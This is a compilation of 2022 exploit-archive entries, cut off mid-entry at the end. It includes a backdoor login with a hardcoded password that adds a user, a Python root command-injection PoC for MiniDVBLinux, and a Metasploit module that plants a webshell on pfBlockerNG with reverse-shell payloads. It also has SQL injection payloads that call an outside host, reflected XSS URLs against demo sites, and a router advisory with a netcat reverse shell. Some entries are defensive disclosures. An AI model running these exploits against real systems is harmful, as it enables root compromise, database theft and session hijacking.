<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/bb309bdd071d5733efefe940a89fcbe8.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Redkod.d<br />Vulnerability: Weak Hardcoded Credentials <br />Description: The malware listens on TCP port 4820. Authentication is required, however the password "redkod" is weak and hardcoded in cleartext within the PE file.<br />Family: Redkod<br />Type: PE32<br />MD5: bb309bdd071d5733efefe940a89fcbe8<br />Vuln ID: MVID-2022-0649<br />Disclosure: 10/16/2022<br /><br />Exploit/PoC:<br />C:\>nc64.exe x.x.x.x 4820<br />===========================================================<br />= RedKod Backdoor 1.0 =<br />= By R-e-D =<br />= http://www.redkod.com =<br />= r-e-d@redkod.com =<br />===========================================================<br /><br /><br />Password: redkod<br /><br />RBackdoor# exec calc<br />msg: Execution effectuee avec succes<br /><br />RBackdoor# setpass malvuln<br /><br />RBackdoor# help<br />COMMAND HELP:<br /><br /><br /> > Shell Commands :<br /><br />CD Permet de changer de repertoire courant<br />CLEAR Efface le buffer de la console<br />COPY Permet de copier un fichier<br />DEL Permet d'effacer un ou plusieurs fichier<br />DIR Permet de lister le contenu d'un repertoire<br />FIND Recherche un fichier a travers le path<br />HELP Affiche cette aide<br />LS Permet de lister le contenu d'un repertoire<br />MD Permet de creer un repertoire<br />MOVE Permet de deplacer un fichier ou un repertoire<br />REN Permet de renommer un fichier<br />PWD Permet de recuperer le repertoire courant<br />RMDIR Permet d'effacer un repertoire<br />SHELL Permet d'executer toute commande DOS sur le systeme cible<br /><br /> > Informations Commands :<br /><br />CLIP Permet de recuperer le contenu du presse papier<br />DISKINFO Permet de recuperer des informations sur les disques durs<br />GETGROUPS Permet de recuperer des informations sur les groupes, les users, les SID :)<br />GETPROCESS Recupere et affiche la liste des processus actifs<br />GETSERVICES Permet d'afficher les services NT presents sur une machine local ou distante<br />LISTEVENT Permet de lister les journaux du eventlog<br />NETSHARE Permer d'afficher les ressources partager de la machine local ou d'u ne machine distante<br />ENUMSERVER Permet d'afficher les servers appartenant au domaine<br />SYSINFO Permet de recuperer des informations sur le systeme cible<br />TIME Affiche l'heure et la date du systeme distant<br />UPTIME Permet d'afficher depuis combien de temps le systeme fonctionne<br />USERINFO Permet d'obtenir des informations sur un utilisateur<br />VERSION Affiche la version de RBackdoor<br />WHOAMI Permet de recuperer l'utilisateur logge sur la machine<br /><br /> > Interactions Commands :<br /><br />ADDEVENT Permet d'ajouter un evenement dans l'eventlog<br />ADDSHARE Permet d'ajouter une ressource partagee<br />BEEP Fait beeper le haut parleur interne<br />CLEARLOG Permet d'effacer un journal complet de l'eventlog<br />DELSERVICE Permet de supprimer un service present<br />DELSHARE Permet de retirer une ressource partagee<br />EXEC Permet d'executer une commande sur le systeme cible<br />HEXEC Permet d'executer une commande tout en cachant sa sortie<br />LOGOFF Permet de fermer la session de l'utilisateur courant<br />KILLPROCESS Permet de killer un processus<br />MOUSE Permet de placer le curseur de la souris au coordonnees x et y voulues<br />MSGBOX Permet d'envoyer une boite de dialogue au systeme cible avec message personalise<br />RCHAT Permet d'etablir une communication ecrite avec une personne etant pr esent sur le pc distant<br />REBOOT Permet de redemarrer la machine<br />SCREENSHOT Permet de prendre un screenshot du bureau de la machine distante<br />SENDKEY Permet d'emuler la pression d'une touche du clavier<br />SETNAME Change le nom NetBios du serveur<br />STARTSERVICE Permet de demarrer un servive present sur la machine serveur<br />STOPSERVICE Permet de stopper un service present et demarrer<br /><br /> > Administration of RBackdoor Commands :<br /><br />EXIT Permet de fermer la connection a la backdoor tout en laissant la backdoor active<br />KILL Permet de desactiver ou de reactiver la backdoor<br />OPEN Creer un nouveau processus de RBackdoor sur un autre port<br />SETPASS Permet de modifier le pass associe a la backdoor<br /><br /> > RBackdoor Tools :<br /><br />FGET Permet de recuperer un fichier sur un serveur FTP<br />FPUT Permet d'uploader un fichier sur un serveur FTP<br />MAIL Permet d'envoyer un mail, etc...<br />NETPATCH Rootkit permettant de patcher netstat.exe pour cacher RBackdoor<br />RCRYPT Permet de crypter ou de decrypter un fichier<br />RPATCH Permet de patcher le systeme pour effacer rbackdoor<br />RSHELL Permet de lancer un vrai shell DOS<br />SCAN Permet de scanner les ports d'une hote distante<br />TELNET Permet de se connecter a une hote distante (TCP Protocol Only)<br />VIEW Permet de lire le contenu d'un fichier<br />WGET Recupere et d'affiche le contenu d'un fichier heberge sur un serveur http<br />WRITE Permet d'ecrire directement dans un fichier<br /><br />msg: Tapez help <command> pour des informations plus precises sur la commande voulue<br /><br />RBackdoor# rshell<br /> ATTENTION!!<br />Pour fermer le shell veuillez tapez 'exit'! Sinon perte de la backdoor envisageable !<br /><br />Microsoft Windows [Version 10.0.16299.309]<br />(c) 2017 Microsoft Corporation. All rights reserved.<br /><br />C:\dump>whoami<br />whoami<br />desktop-2c4jqho\victim<br /><br />C:\dump>net user hyp3rlinx 666 /add<br />net user hyp3rlinx 666 /add<br />The command completed successfully.<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>#!/usr/bin/env python3<br />#<br />#<br /># MiniDVBLinux 5.4 Remote Root Command Injection Vulnerability<br />#<br />#<br /># Vendor: MiniDVBLinux<br /># Product web page: https://www.minidvblinux.de<br /># Affected version: <=5.4<br />#<br /># Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple<br /># way to convert a standard PC into a Multi Media Centre based on the<br /># Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this<br /># Linux based Digital Video Recorder: Watch TV, Timer controlled<br /># recordings, Time Shift, DVD and MP3 Replay, Setup and configuration<br /># via browser, and a lot more. MLD strives to be as small as possible,<br /># modular, simple. It supports numerous hardware platforms, like classic<br /># desktops in 32/64bit and also various low power ARM systems.<br />#<br /># Desc: The application suffers from an OS command injection vulnerability.<br /># This can be exploited to execute arbitrary commands with root privileges.<br />#<br /># Tested on: MiniDVBLinux 5.4<br /># BusyBox v1.25.1<br /># Architecture: armhf, armhf-rpi2<br /># GNU/Linux 4.19.127.203 (armv7l)<br /># VideoDiskRecorder 2.4.6<br />#<br />#<br /># Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /># @zeroscience<br />#<br />#<br /># Advisory ID: ZSL-2022-5717<br /># Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5717.php<br />#<br />#<br /># 24.09.2022<br />#<br /><br />import requests<br />import re,sys<br /><br />#test case 001<br />#http://ip:8008/?site=about&name=MLD%20about&file=/boot/ABOUT<br />#test case 004<br />#http://ip:8008/?site=about&name=blind&file=$(id)<br />#cat: can't open 'uid=0(root)': No such file or directory<br />#cat: can't open 'gid=0(root)': No such file or directory<br />#test case 005<br />#http://ip:8008/?site=about&name=blind&file=`id`<br />#cat: can't open 'uid=0(root)': No such file or directory<br />#cat: can't open 'gid=0(root)': No such file or directory<br /><br />if len(sys.argv) < 3:<br /> print('MiniDVBLinux 5.4 Command Injection PoC')<br /> print('Usage: ./mldhd_root2.py [url] [cmd]')<br /> sys.exit(17)<br />else:<br /> url = sys.argv[1]<br /> cmd = sys.argv[2]<br /><br />req = requests.get(url+'/?site=about&name=ZSL&file=$('+cmd+')')<br />outz = re.search('<pre>(.*?)</pre>',req.text,flags=re.S).group()<br />print(outz.replace('<pre>','').replace('</pre>',''))<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> include Msf::Exploit::FileDropper<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'pfSense plugin pfBlockerNG unauthenticated RCE as root',<br /> 'Description' => %q{<br /> pfBlockerNG is a popular pfSense plugin that is not installed by default. It’s generally used to<br /> block inbound connections from whole countries or IP ranges. Versions 2.1.4_26 and below are affected<br /> by an unauthenticated RCE vulnerability that results in root access. Note that version 3.x is unaffected.<br /> },<br /> 'Author' => [<br /> 'IHTeam', # discovery<br /> 'jheysel-r7' # module<br /> ],<br /> 'References' => [<br /> [ 'CVE', '2022-31814' ],<br /> [ 'URL', 'https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/']<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => 'unix',<br /> 'Privileged' => false,<br /> 'Arch' => [ ARCH_CMD ],<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_openssl'<br /> }<br /> }<br /> ],<br /> [<br /> 'BSD Dropper',<br /> {<br /> 'Platform' => 'bsd',<br /> 'Arch' => [ARCH_X64],<br /> 'Type' => :bsd_dropper,<br /> 'CmdStagerFlavor' => [ 'curl' ],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'bsd/x64/shell_reverse_tcp'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 1,<br /> 'DisclosureDate' => '2022-09-05',<br /> 'DefaultOptions' => {<br /> 'SSL' => true,<br /> 'RPORT' => 443<br /> },<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SERVICE_DOWN ],<br /> 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],<br /> 'Reliability' => [ REPEATABLE_SESSION, ]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> OptString.new('WEBSHELL_NAME', [<br /> false, 'The name of the uploaded webshell sans the ".php" ending. This value will be randomly generated if left unset.', nil<br /> ])<br /> ]<br /> )<br /> end<br /><br /> def upload_shell<br /> print_status 'Uploading shell...'<br /> if datastore['WEBSHELL_NAME'].blank?<br /> @webshell_name = "#{Rex::Text.rand_text_alpha(8..16)}.php"<br /> else<br /> @webshell_name = "#{datastore['WEBSHELL_NAME']}.php"<br /> end<br /> @parameter_name = Rex::Text.rand_text_alpha(4..12)<br /> print_status("Webshell name is: #{@webshell_name}")<br /> web_shell_contents = <<~EOF<br /> <?php echo file_put_contents('/usr/local/www/#{@webshell_name}','<?php echo(passthru($_POST["#{@parameter_name}"]));');<br /> EOF<br /> encoded_php = web_shell_contents.unpack('H*')[0].upcase<br /> send_request_raw(<br /> 'uri' => normalize_uri(target_uri.path, '/pfblockerng/www/index.php'),<br /> 'headers' => {<br /> 'Host' => "' *; echo '16i #{encoded_php} P' | dc | php; '"<br /> }<br /> )<br /> sleep datastore['WfsDelay']<br /> register_file_for_cleanup("/usr/local/www/#{@webshell_name}")<br /> end<br /><br /> def check<br /> upload_shell<br /> check_resp = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, "/#{@webshell_name}"),<br /> 'vars_post' => {<br /> @parameter_name.to_s => 'id'<br /> }<br /> )<br /> return Exploit::CheckCode::Safe('Error uploading shell, the system is likely patched.') if check_resp.nil? || check_resp.body.nil? || !check_resp.body.include?('uid=0(root) gid=0(wheel)')<br /><br /> Exploit::CheckCode::Vulnerable<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, @webshell_name),<br /> 'headers' => {<br /> 'Content-Encoding' => 'application/x-www-form-urlencoded; charset=UTF-8'<br /> },<br /> 'vars_post' => {<br /> @parameter_name.to_s => cmd<br /> }<br /> })<br /> end<br /><br /> def exploit<br /> upload_shell unless datastore['AutoCheck']<br /> print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")<br /> case target['Type']<br /> when :unix_cmd<br /> execute_command(payload.encoded)<br /> when :bsd_dropper<br /> execute_cmdstager<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : extensions.joomla.org │<br />│ Vendor : Webtribute GmbH - courts-reservation.ch │<br />│ Software : Joomla OSG Courts Reservation 1.4.9 │<br />│ Vuln Type: SQL Injection │<br />│ Method : GET │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ Typically used for remotely exploitable vulnerabilities that can lead to │<br />│ system compromise │<br />│ │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /en/table-views/tab-view/booking<br /><br />GET parameter 'date' is vulnerable<br /><br /><br />---<br />Parameter: date (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: rid=17&tsid=16&date=2022-10-12" AND (SELECT 6041 FROM(SELECT COUNT(*),CONCAT(0x716b7a7671,(SELECT (ELT(6041=6041,1))),0x7170766a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- fmfh&wd=3<br />---<br /><br /><br />[+] Starting the Attack<br /><br />[INFO] the back-end DBMS is MySQL<br />web application technology: Nginx<br />back-end DBMS: MySQL >= 5.0 (MariaDB fork)<br />[INFO] fetching current database<br /><br />current database: '***_osg_courts_demo'<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>CyberDanube Security Research 20221009-0<br />-------------------------------------------------------------------------------<br /> title| Authenticated Command Injection<br /> product| Intelbras WiFiber 120AC inMesh<br /> vulnerable version| 1.1-220216<br /> fixed version| 1-1-220826<br /> CVE number|<br /> impact| High<br /> homepage| https://www.intelbras.com<br /> found| 2022-08-01<br /> by| T. Weber (Office Vienna)<br /> | CyberDanube Security Research<br /> | Vienna | St. Pölten<br /> |<br /> | https://www.cyberdanube.com<br />-------------------------------------------------------------------------------<br /><br />Vendor description<br />-------------------------------------------------------------------------------<br />"We are Intelbras. A company that for 45 years has been offering innovative<br />solutions in security, networks, communication and energy. Our dream <br />began to<br />come to life there in 1976, in the city of São José, having originated <br />from an<br />INspiration and a promising idea: to manufacture PABX centrals. During the<br />80's, we surprised the market with the launch of the first PABX <br />developed with<br />national technology, a product that showed everyone our innovative DNA. <br />The 90s<br />were marked by the consolidation of the company in the telecommunications<br />segment and we became leaders in the PABX and telephone terminals <br />segment. The<br />turn of the millennium represented the search for greater connection and<br />proximity to people, something that is in total harmony with our <br />philosophy to<br />this day. More consolidated in the market, in 2010 we opened 3 manufacturing<br />units, located in Santa Rita do Sapucaí/MG, Manaus/AM and São José/SC.<br />We reached our 45th birthday having reached a historic milestone: we <br />have been<br />a company listed on the B3 since February 2021. Our trajectory so far <br />has been<br />INnovative, INtelligent and INSpiring. We saw innovation, which is part <br />of our<br />DNA, increasingly present in our daily lives. And it was only possible to<br />write a story so full of achievements because employees, partners and <br />customers<br />were close and believed in us."<br /><br />Source: https://www.intelbras.com/en/institutional/who-we-are<br /><br /><br />Vulnerable versions<br />-------------------------------------------------------------------------------<br />WiFiber 120AC inMesh / 1.1-220216<br /><br /><br />Vulnerability overview<br />-------------------------------------------------------------------------------<br />1) Authenticated Command Injection<br />The web server of the device is prone to an authenticated command injection.<br />It allows an attacker to gain full access to the underlying operating <br />system of<br />the device with all implications. If such a device is acting as key <br />device in<br />an industrial network, more extensive damage in the corresponding <br />network can<br />be done by an attacker.<br /><br /><br />Proof of Concept<br />-------------------------------------------------------------------------------<br />1) Authenticated Command Injection<br />The web server is prone to an authenticated command injection via POST<br />parameters. The following proof-of-concept shows how to inject the command<br />"ls /" to the system which gets executed in the background:<br /><br />===============================================================================<br />POST /boaform/formPing6 HTTP/1.1<br />Host: 192.168.3.147<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 <br />Firefox/91.0<br />Accept: <br />text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: de,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 87<br />Origin: http://192.168.3.147<br />Connection: close<br />Referer: http://192.168.3.147/ping6.asp<br />Upgrade-Insecure-Requests: 1<br /><br />pingAddr=%3Bls+%2F%3B&wanif=65535&go=+Ir&submit-url=%2Fping6.asp&postSecurityFlag=39908<br />===============================================================================<br /><br />The following commands can be used to open a reverse shell:<br /><br />"rm -f /tmp/f"<br />"mkfifo /tmp/f"<br />"cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.3.138 8889 >/tmp/f"<br /><br />Those commands were sent via a crafted POST request:<br /><br />===============================================================================<br />POST /boaform/formTracert HTTP/1.1<br />Host: 192.168.3.147<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 <br />Firefox/91.0<br />Accept: <br />text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: de,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 255<br />Origin: http://192.168.3.147<br />Connection: close<br />Referer: http://192.168.3.147/tracert.asp<br />Upgrade-Insecure-Requests: 1<br /><br />proto=0&traceAddr=%3Brm+-f+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.3.138+8889+%3E%2Ftmp%2Ff%3B&trys=3&timeout=5&datasize=56&dscp=0&maxhop=30&wanif=65535&go=+Ir&submit-url=%2Ftracert.asp&postSecurityFlag=29290<br />===============================================================================<br /><br />The vulnerability was manually verified on an emulated device by using the<br />MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).<br /><br /><br />Solution<br />-------------------------------------------------------------------------------<br />Update to firmware version 1-1-220826.<br /><br />https://backend.intelbras.com/sites/default/files/2022-08/ONT_Wifiber_120_AC_Vers%C3%A3o_1-1-220826.zip<br /><br /><br />Workaround<br />-------------------------------------------------------------------------------<br />None<br /><br /><br />Recommendation<br />-------------------------------------------------------------------------------<br />CyberDanube recommends Intelbras customers to upgrade the firmware to the<br />latest version available.<br /><br /><br />Contact Timeline<br />-------------------------------------------------------------------------------<br />2022-08-02: Contacting Intelbras via suporte@intelbras.com.br.<br />2022-08-03: Request from Intelbras to send the advisory to<br /> csirt@intelbras.com.br; Sent the advisory to this address.<br />2022-08-30: Asked for status update; Vendor answered that the new firmware<br /> version has been released the day before. Set the <br />disclosure date<br /> to 2022-10-03 (60 days policy).<br />2022-10-03: Shifted disclosure date to 2022-10-09 due to sick colleagues.<br />2022-10-09: Coordinated disclosure of advisory.<br /><br /><br />Web: https://www.cyberdanube.com<br />Twitter: https://twitter.com/cyberdanube<br />Mail: research at cyberdanube dot com<br /><br />EOF T. Weber / @2022<br /><br /></code></pre>
<pre><code>The online-shopping-system-advanced-1.0 suffers from multiple SQLi<br />The attacker can steal all information from the database of this system.<br />Status: CRITICAL<br /><br />[+] Exploit:<br /><br />```MYSQL<br />Parameter: cid (POST)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br /> Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(select<br />load_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+''<br />OR NOT 4084=4084 AND 'icSi'='icSi<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP<br />BY clause (FLOOR)<br /> Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(select<br />load_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+''<br />AND (SELECT 3031 FROM(SELECT COUNT(*),CONCAT(0x716a707a71,(SELECT<br />(ELT(3031=3031,1))),0x716a717871,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'gwMy'='gwMy<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(select<br />load_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+''<br />AND (SELECT 4189 FROM (SELECT(SLEEP(17)))bNrO) AND 'UbMN'='UbMN<br /><br /> Type: UNION query<br /> Title: MySQL UNION query (NULL) - 4 columns<br /> Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(select<br />load_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+''<br />UNION ALL SELECT<br />NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a707a71,0x7a4e4f74416a58717749646143726a6e68714368626556676e756d7076764867677176516b58684f,0x716a717871),NULL,NULL,NULL#<br />```<br />--------------------------------------------------------------------------------------------<br />```MYSQL<br />Parameter: password (POST)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP<br />BY clause (FLOOR)<br /> Payload: email=wGpFwAQH@tupmangal.net&password=e2H!l7r!I2' AND (SELECT<br />7287 FROM(SELECT COUNT(*),CONCAT(0x71766a6b71,(SELECT<br />(ELT(7287=7287,1))),0x7171716b71,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# oUWI&remember-me=on<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: email=wGpFwAQH@tupmangal.net&password=e2H!l7r!I2' AND (SELECT<br />7259 FROM (SELECT(SLEEP(17)))yXIE)# kWgA&remember-me=on<br />````<br />--------------------------------------------------------------------------------------------<br /><br />```MYSQL<br /><br />```<br /><br />## And more:<br /><br />```txt<br />[1.1. http://pwnedhost.com/online-shopping-system-advanced/action.php [cid<br />parameter]]<br />[1.2. http://pwnedhost.com/online-shopping-system-advanced/action.php [cid<br />parameter]]<br />[1.3. http://pwnedhost.com/online-shopping-system-advanced/login.php<br />[password parameter]]<br />[1.4. http://pwnedhost.com/online-shopping-system-advanced/product.php [p<br />parameter]]<br />[1.5. http://pwnedhost.com/online-shopping-system-advanced/product.php [p<br />parameter]]<br />[1.6. http://pwnedhost.com/online-shopping-system-advanced/review.php<br />[email parameter]]<br />[1.7. http://pwnedhost.com/online-shopping-system-advanced/review.php [name<br />parameter]]<br />```<br />PoC:<br />https://github.com/PuneethReddyHC/online-shopping-system-advanced/issues/51<br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at https://packetstormsecurity.com/<br />https://cve.mitre.org/index.html and https://www.exploit-db.com/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable Crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : wordpress.org/plugins/ecommerce-product-catalog/ │<br />│ Vendor : impleCode - implecode.com │<br />│ Software : WordPress eCommerce Product Catalog 3.0.70 │<br />│ Vuln Type: Reflected XSS │<br />│ Method : GET │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />URL parameter 'product_category' is vulnerable to XSS<br /><br />Path: /product-category/clothing/sunglasses/men/<br /> <br />https://demo.implecode.com/product-category/clothing/sunglasses/men/?product_category=40&gr0ln%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ewop2e=1<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : extensions.joomla.org │<br />│ Vendor : ClickFWD LLC. - jreviews.com │<br />│ Software : WordPress JReviews 4.1.5 │<br />│ Vuln Type: Reflected XSS │<br />│ Method : GET │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />URL parameter 'listview' is vulnerable to XSS<br /><br />Path: /top-user-rated-listings<br /> <br />https://wp-demo.jreviews.com/top-user-rated-listings?listview=2&qrrwx%22%3e%3cscript%3ealert(1)%3c%2fscript%3et16n9=1<br /><br /><br />URL parameter 'format' is vulnerable to XSS<br /><br />Path: /advanced-search/search-results<br /><br />https://wp-demo.jreviews.com/advanced-search/search-results?pg=2&order=featured&query=all&format=raw&mzh9g%22%3e%3cscript%3ealert(1)%3c%2fscript%3ei8emo=1<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable Crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : extensions.joomla.org │<br />│ Vendor : e4j Extensions for Joomla - extensionsforjoomla.com │<br />│ Software : Joomla Vik Rent Car 1.14 │<br />│ Vuln Type: Reflected XSS │<br />│ Method : GET │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide 